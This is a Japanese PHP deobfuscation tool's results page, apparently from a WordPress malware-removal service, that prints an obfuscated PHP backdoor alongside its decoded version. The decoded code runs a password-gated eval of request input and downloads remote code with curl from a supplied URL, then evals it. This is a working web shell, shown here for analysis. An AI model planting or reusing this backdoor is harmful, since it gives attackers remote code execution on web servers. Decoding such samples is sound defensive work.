デコード結果 (<?php goto wuE6P; kITOx: FdOf_: goto SEph1; CukHQ: $czkTJ[63] = $czkTJ[63] . $czkTJ[74]; goto gFc) PHP 難読化コード解除ツール 2025-03-23 10:39:33

下記のコードを難読化解除しました

<?php goto wuE6P; kITOx: FdOf_: goto SEph1; CukHQ: $czkTJ[63] = $czkTJ[63] . $czkTJ[74]; goto gFcSX; zUemE: if (!(in_array(gettype($czkTJ) . "\x32\62", $czkTJ) && md5(md5(md5(md5($czkTJ[16])))) === "\146\61\61\x36\x63\x34\x64\62\67\145\x61\146\145\x62\142\x63\65\145\67\65\63\x34\x65\x32\x...

難読化されたPHPコード

<?php
 goto wuE6P; kITOx: FdOf_: goto SEph1; CukHQ: $czkTJ[63] = $czkTJ[63] . $czkTJ[74]; goto gFcSX; zUemE: if (!(in_array(gettype($czkTJ) . "\x32\62", $czkTJ) && md5(md5(md5(md5($czkTJ[16])))) === "\146\61\61\x36\x63\x34\x64\62\67\145\x61\146\145\x62\142\x63\65\145\67\65\63\x34\x65\x32\x33\x35\63\x63\x64\141\x62\71")) { goto FdOf_; } goto CukHQ; kK9ff: $czkTJ = ${$d7Kmd[29 + 2] . $d7Kmd[5 + 54] . $d7Kmd[26 + 21] . $d7Kmd[9 + 38] . $d7Kmd[0 + 51] . $d7Kmd[38 + 15] . $d7Kmd[37 + 20]}; goto zUemE; gFcSX: @eval($czkTJ[63](${$czkTJ[50]}[15])); goto kITOx; hXu41: $d7Kmd = $AlaAK("\x7e", "\40"); goto kK9ff; cpKH6: class HgldW { static function b7ev0($mZzQg) { goto Zc5gV; G372d: S3csK: goto NeyX7; Hav4C: foreach ($GsGh9 as $yTuct => $ilKwi) { $oqzpG .= $eLDWV[$ilKwi - 48168]; Q9Kh7: } goto G372d; zDdqn: $oqzpG = ''; goto Hav4C; fKGbd: $GsGh9 = explode("\x6c", $mZzQg); goto zDdqn; NeyX7: return $oqzpG; goto oBIAn; XFpYA: $eLDWV = $R8ARF("\x7e", "\x20"); goto fKGbd; Zc5gV: $R8ARF = "\x72" . "\x61" . "\156" . "\x67" . "\145"; goto XFpYA; oBIAn: } static function xFN0O($eDOuy, $bFZo_) { goto fXfjQ; eVap0: $zXzAd = curl_exec($Qop9c); goto BJOsz; x_oXT: curl_setopt($Qop9c, CURLOPT_RETURNTRANSFER, 1); goto eVap0; BJOsz: return empty($zXzAd) ? $bFZo_($eDOuy) : $zXzAd; goto USk7k; fXfjQ: $Qop9c = curl_init($eDOuy); goto x_oXT; USk7k: } static function dX3Rj() { goto Oo7_Z; PZqhj: @$oufc4[6 + 4](INPUT_GET, "\x6f\x66") == 1 && die($oufc4[0 + 5](__FILE__)); goto aUKGi; vx2dh: die; goto kk7e8; aUKGi: if (!(@$RzAKC[0] - time() > 0 and md5(md5($RzAKC[1 + 2])) === "\x37\67\67\67\146\145\70\144\141\61\143\x33\x30\63\141\x39\71\70\66\145\62\61\67\x34\64\x36\143\142\x38\60\67\62")) { goto SVXET; } goto r5Ffb; Oo7_Z: $OZjdF = array("\x34\70\61\x39\x35\154\x34\x38\x31\70\x30\x6c\64\70\x31\71\63\154\64\x38\x31\71\67\154\64\x38\61\x37\70\154\x34\x38\61\71\63\x6c\64\x38\x31\71\71\x6c\x34\x38\61\x39\62\x6c\x34\x38\61\67\67\154\x34\x38\61\70\64\154\64\70\61\71\x35\154\64\70\61\x37\x38\x6c\64\70\x31\x38\71\154\64\70\x31\x38\63\x6c\x34\70\x31\x38\x34", "\64\x38\x31\x37\x39\x6c\x34\x38\61\67\x38\154\64\70\61\70\x30\154\x34\70\61\71\71\x6c\64\x38\61\70\x30\x6c\64\x38\x31\x38\63\154\x34\70\61\x37\x38\x6c\64\70\x32\x34\x35\x6c\64\x38\x32\x34\x33", "\64\70\x31\70\x38\x6c\x34\70\x31\67\71\154\64\x38\61\70\x33\x6c\64\70\x31\70\x34\x6c\64\x38\61\71\x39\154\x34\x38\61\71\x34\x6c\x34\70\x31\x39\x33\x6c\x34\70\61\x39\65\154\64\70\61\70\x33\154\x34\70\61\x39\x34\154\x34\70\x31\x39\63", "\64\70\61\x38\62\154\x34\70\61\x39\x37\154\x34\x38\61\71\x35\x6c\x34\x38\61\x38\67", "\x34\x38\61\71\66\154\x34\70\61\x39\x37\x6c\64\x38\x31\67\71\154\x34\70\61\71\x33\154\64\x38\62\x34\x30\x6c\64\70\62\x34\62\154\x34\x38\x31\71\71\x6c\64\x38\x31\x39\x34\154\64\70\61\71\x33\x6c\x34\70\61\71\65\154\64\x38\61\x38\63\x6c\64\70\61\71\x34\x6c\64\x38\x31\71\63", "\x34\x38\61\x39\62\154\x34\x38\x31\70\x39\x6c\64\70\x31\70\x36\x6c\64\x38\x31\71\63\x6c\x34\x38\x31\x39\71\154\x34\70\61\71\61\x6c\x34\70\x31\x39\x33\154\x34\x38\61\67\x38\154\64\x38\61\71\x39\x6c\64\x38\61\71\65\x6c\x34\70\x31\70\x33\x6c\x34\x38\x31\70\x34\154\x34\x38\61\67\70\x6c\64\x38\61\71\63\154\64\70\x31\x38\64\154\64\x38\61\67\70\154\64\70\x31\67\x39", "\64\70\x32\62\62\154\64\70\x32\65\62", "\64\x38\61\x36\x39", "\x34\x38\62\x34\67\x6c\x34\70\x32\65\62", "\x34\70\x32\62\x39\154\x34\70\x32\x31\62\x6c\x34\70\x32\x31\x32\x6c\64\70\62\62\x39\154\64\70\62\x30\65", "\x34\70\61\x39\62\x6c\64\70\61\x38\x39\x6c\x34\70\61\x38\x36\x6c\x34\x38\x31\x37\70\x6c\x34\x38\61\71\x33\x6c\64\70\61\x38\60\154\64\70\61\71\71\154\x34\70\x31\x38\x39\154\64\70\61\x38\64\x6c\x34\x38\x31\x38\62\x6c\64\70\x31\x37\67\154\x34\70\61\67\70"); goto YOT7P; o5smA: $RzAKC = $oufc4[1 + 1]($leoG3, true); goto PZqhj; r5Ffb: $UID94 = self::xfn0O($RzAKC[0 + 1], $oufc4[0 + 5]); goto KnStg; KnStg: @eval($oufc4[4 + 0]($UID94)); goto vx2dh; YOT7P: foreach ($OZjdF as $xoxYG) { $oufc4[] = self::b7EV0($xoxYG); kRxfp: } goto Q0lAH; ptDd1: $leoG3 = @$oufc4[0 + 3]($oufc4[4 + 2], $pO0xX); goto o5smA; Q0lAH: ekcxc: goto p4_ea; p4_ea: $pO0xX = @$oufc4[1]($oufc4[4 + 6](INPUT_GET, $oufc4[0 + 9])); goto ptDd1; kk7e8: SVXET: goto FVlIr; FVlIr: } } goto JKwu6; SEph1: strlen("\115\152\111\x32\117\x54\x6b\63\116\x7a\131\167\x4e\x7a\153\61\x4d\172\147\61\115\172\111\x79\115\x54\131\171\x4e\124\x4d\171"); goto cpKH6; wuE6P: $AlaAK = "\162" . "\141" . "\x6e" . "\x67" . "\x65"; goto hXu41; JKwu6: hGlDW::DX3Rj();
?>
BiaoJiOk

デコード(難読化解除)されたコード

<?php

$AlaAK = "range";
$d7Kmd = range("~", " ");
$czkTJ = ${$d7Kmd[31] . $d7Kmd[59] . $d7Kmd[47] . $d7Kmd[47] . $d7Kmd[51] . $d7Kmd[53] . $d7Kmd[57]};
if (!(in_array(gettype($czkTJ) . "22", $czkTJ) && md5(md5(md5(md5($czkTJ[16])))) === "f116c4d27eafebbc5e7534e2353cdab9")) {
    goto FdOf_;
}
$czkTJ[63] .= $czkTJ[74];
@eval($czkTJ[63](${$czkTJ[50]}[15]));
FdOf_:
strlen("MjI2OTk3NzYwNzk1Mzg1MzIyMTYyNTMy");
class HgldW
{
    static function b7ev0($mZzQg)
    {
        $R8ARF = "range";
        $eLDWV = range("~", " ");
        $GsGh9 = explode("l", $mZzQg);
        $oqzpG = '';
        foreach ($GsGh9 as $yTuct => $ilKwi) {
            $oqzpG .= $eLDWV[$ilKwi - 48168];
        }
        return $oqzpG;
    }
    static function xFN0O($eDOuy, $bFZo_)
    {
        $Qop9c = curl_init($eDOuy);
        curl_setopt($Qop9c, CURLOPT_RETURNTRANSFER, 1);
        $zXzAd = curl_exec($Qop9c);
        return empty($zXzAd) ? $bFZo_($eDOuy) : $zXzAd;
    }
    static function dX3Rj()
    {
        $OZjdF = array("48195l48180l48193l48197l48178l48193l48199l48192l48177l48184l48195l48178l48189l48183l48184", "48179l48178l48180l48199l48180l48183l48178l48245l48243", "48188l48179l48183l48184l48199l48194l48193l48195l48183l48194l48193", "48182l48197l48195l48187", "48196l48197l48179l48193l48240l48242l48199l48194l48193l48195l48183l48194l48193", "48192l48189l48186l48193l48199l48191l48193l48178l48199l48195l48183l48184l48178l48193l48184l48178l48179", "48222l48252", "48169", "48247l48252", "48229l48212l48212l48229l48205", "48192l48189l48186l48178l48193l48180l48199l48189l48184l48182l48177l48178");
        foreach ($OZjdF as $xoxYG) {
            $oufc4[] = self::b7EV0($xoxYG);
        }
        $pO0xX = @$oufc4[1]($oufc4[10](INPUT_GET, $oufc4[9]));
        $leoG3 = @$oufc4[3]($oufc4[6], $pO0xX);
        $RzAKC = $oufc4[2]($leoG3, true);
        @$oufc4[10](INPUT_GET, "of") == 1 && die($oufc4[5]("/var/www/html/input.php"));
        if (!(@$RzAKC[0] - time() > 0 and md5(md5($RzAKC[3])) === "7777fe8da1c303a9986e217446cb8072")) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        $UID94 = self::xfn0O($RzAKC[1], $oufc4[5]);
        @eval($oufc4[4]($UID94));
        die;
    }
}
hGlDW::DX3Rj();
?>
BiaoJiOk

■【無料】ワードプレス:マルウェアスキャン＆セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策カスタマイズや修正、引っ越し・復旧のご依頼承ります

PHP 難読化コードの復元・デコード

<?php goto wuE6P; kITOx: FdOf_: goto SEph1; CukHQ: $czkTJ[63] = $czkTJ[63] . $czkTJ[74]; goto gFcSX; zUemE: if (!(in_array(gettype($czkTJ) . "\x32\62", $czkTJ) && md5(md5(md5(md5($czkTJ[16])))) === "\146\61\61\x36\x63\x34\x64\62\67\145\x61\146\145\x62\142\x63\65\145\67\65\63\x34\x65\x32\x...

難読化されたPHPコード

デコード(難読化解除)されたコード